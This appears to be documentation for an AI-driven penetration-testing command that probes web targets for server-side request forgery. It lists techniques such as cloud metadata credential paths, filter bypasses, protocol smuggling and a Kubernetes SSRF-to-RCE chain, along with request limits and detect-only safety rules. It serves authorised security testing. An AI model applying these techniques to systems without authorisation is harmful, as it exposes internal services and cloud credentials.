SSRF Testing (`/test-ssrf`)¶

Tests for Server-Side Request Forgery vulnerabilities per OWASP A01:2025 (merged from A10:2021) and PortSwigger Academy. SSRF is rising in HackerOne bounties (+10% YoY, $3.5K-$50K rewards). Critical for cloud-hosted targets due to metadata endpoint exposure (AWS IMDSv1/v2, GCP, Azure).

/test-ssrf <target_url> [collaborator_url] [engagement_dir]

Scope Routing¶

Scope	Sections	Focus
`core`	STEP 0 + A + B + C0-C6 + D	Standard SSRF: direct requests, cloud metadata (AWS/GCP/Azure), filter bypass (IP obfuscation, DNS rebinding, redirect chains), blind OOB detection
`vector`	C5 protocol smuggling + C7 + E + F + G + H	Non-standard vectors: gopher/dict/file protocol smuggling, git:// CRLF to Redis, PDF generator, SVG, FFmpeg, PlantUML, webhook, rogue MySQL, Sentry, Spring Boot Actuator, K8s SSRF-to-RCE chain, Apache UNC paths

Shared Steps

STEP 0 (endpoint discovery) and A (attack surface identification) always run regardless of scope -- they provide targets to all other sections.

Coverage¶

URL-Accepting Parameter Discovery -- Automated discovery of all endpoints accepting URLs: webhooks, import, link preview, proxy, fetch, download, image URL, avatar URL, feed, RSS, XML URL.
Basic SSRF -- Direct URL input, localhost/loopback access, internal IP range scanning (10.x, 172.16.x, 192.168.x), cloud metadata endpoints.
Cloud Metadata -- AWS IMDSv1 (direct), AWS IMDSv2 (token-based), GCP (Metadata-Flavor: Google header), Azure (Metadata: true header). Full credential extraction path documentation.
Filter Bypass -- IP obfuscation (decimal, hex, octal, IPv6 mapped), DNS rebinding, URL parser differentials, redirect-based bypass, redirect loops, double encoding, fragment tricks.
Protocol Smuggling -- gopher://, dict://, file:// protocol exploitation. git:// CRLF injection to Redis.
Blind SSRF -- OOB detection via webhook.site, interactsh, Burp Collaborator. DNS-based detection.
Non-URL Vectors -- PDF generators (wkhtmltopdf, Puppeteer), SVG image processing, FFmpeg concat protocol, PlantUML server-side rendering, webhook configurations, git config URLs, rogue MySQL server, Sentry DSN.
Spring Boot Actuator -- SSRF to access Actuator endpoints (env, configprops, heapdump) on internal ports.
K8s SSRF-to-RCE Chain -- Full escalation: SSRF to GCP metadata to kube-env to Kubelet client certs to pod listing to service account tokens to exec.
Internal Port Scanning -- Scanning ports 8080, 8443, 3000, 5000, 9090 via SSRF when direct access fails.

Key Sections¶

Section	ID	Description
Endpoint Discovery	STEP 0	Discovers all URL-accepting parameters from injectable-params.json and probes common SSRF-vulnerable endpoints.
Attack Surface	A	Identifies SSRF-prone functionality: URL previews, PDF generators, image fetchers, webhooks, OAuth callbacks, XML parsers, RSS readers, proxy functions.
Basic SSRF	B	Direct URL input (B1), localhost/loopback (B2), internal IP ranges (B3), cloud metadata (B4).
Filter Bypass	C0-C6	IP obfuscation (C0), DNS rebinding (C1), URL parser differentials (C2), redirect-based (C5), redirect loops (C6), protocol smuggling (C5 vector scope), git:// CRLF (C7).
Blind SSRF / OOB	D	OOB callback detection for blind SSRF where no response content is returned.
Non-URL Vectors	E	PDF generator SSRF, SVG processing, FFmpeg concat, PlantUML, webhook SSRF, git config, rogue MySQL, Sentry DSN.
Spring Boot Actuator	F	Actuator endpoint access via SSRF (F1-F2).
K8s SSRF-to-RCE	G	Full escalation chain documentation and detection.
Platform-Specific	H	Apache UNC paths, platform-specific SSRF notes.

Loopback Bypass Rules¶

When the target blocks obvious loopback values such as 127.0.0.1 or localhost, apply these general rules instead of jumping straight to exotic vectors:

Start with canonical loopback representations.
If the filter behaves like a blacklist, move to alternate IPv4 representations from the same semantic family: shorthand IPv4, integer-form IPv4, and alternate radix encodings.
Escalate to redirect, parser-differential, or DNS-based techniques only after the simple representation family has been exhausted.
Treat parser-dependent subnet or shorthand edge cases as targeted follow-up checks, not as default payloads.

The important part is sequencing: prefer the cheapest semantic-equivalent representations first, and widen the search space only after filter fingerprinting shows that the validation logic is weak or inconsistent.

Model and Thinking Budget¶

Component	Model	Rationale
Core SSRF	Sonnet	Systematic payload delivery and response analysis
Filter bypass	Sonnet	Methodical testing of bypass techniques
Chain detection	Opus (medium)	Escalation chain reasoning for K8s SSRF-to-RCE

Kill Switch¶

Limit	Value
Timeout	45 minutes
Max requests	500 (warning at 400)
OOB polling	Max 30 seconds wait per OOB check

AI Decision Points¶

Three [AI-DECISION] markers:

Server-Side vs Client-Side (A) -- Analyze whether a URL parameter is fetched server-side or used client-side. Server-side: look for response content differences when pointing to controlled URLs. Client-side: just a link/redirect.
Filter Fingerprinting (C) -- Fingerprint the SSRF filter (allowlist vs blocklist, URL parser library) before selecting bypass technique. Test systematically from simple to complex.
Cloud Environment Detection (D) -- Determine cloud environment from context (AWS/GCP/Azure/K8s) and select appropriate metadata endpoints and required headers.

Knowledge Packs and Cheatsheets¶

Resource	Path
SSRF cheatsheet	`helpers/cheatsheet-ssrf.md`
Cloud metadata payloads	`payloads/cloud-metadata.md`
OOB detection guide	`payloads/oob-detection.md`
Research terms	`helpers/research-terms.md`
Exemplars	`helpers/exemplars.md`

External payload files: PayloadsAllTheThings SSRF payloads, URL bypass intruder lists.

Safety¶

Use OOB callback services (webhook.site, interactsh) for blind detection.
Never attack internal services -- only detect reachability.
Never access real cloud credentials -- stop at the credential endpoint and document.
All findings require a working, reproducible PoC.

SSRF Testing (/test-ssrf)¶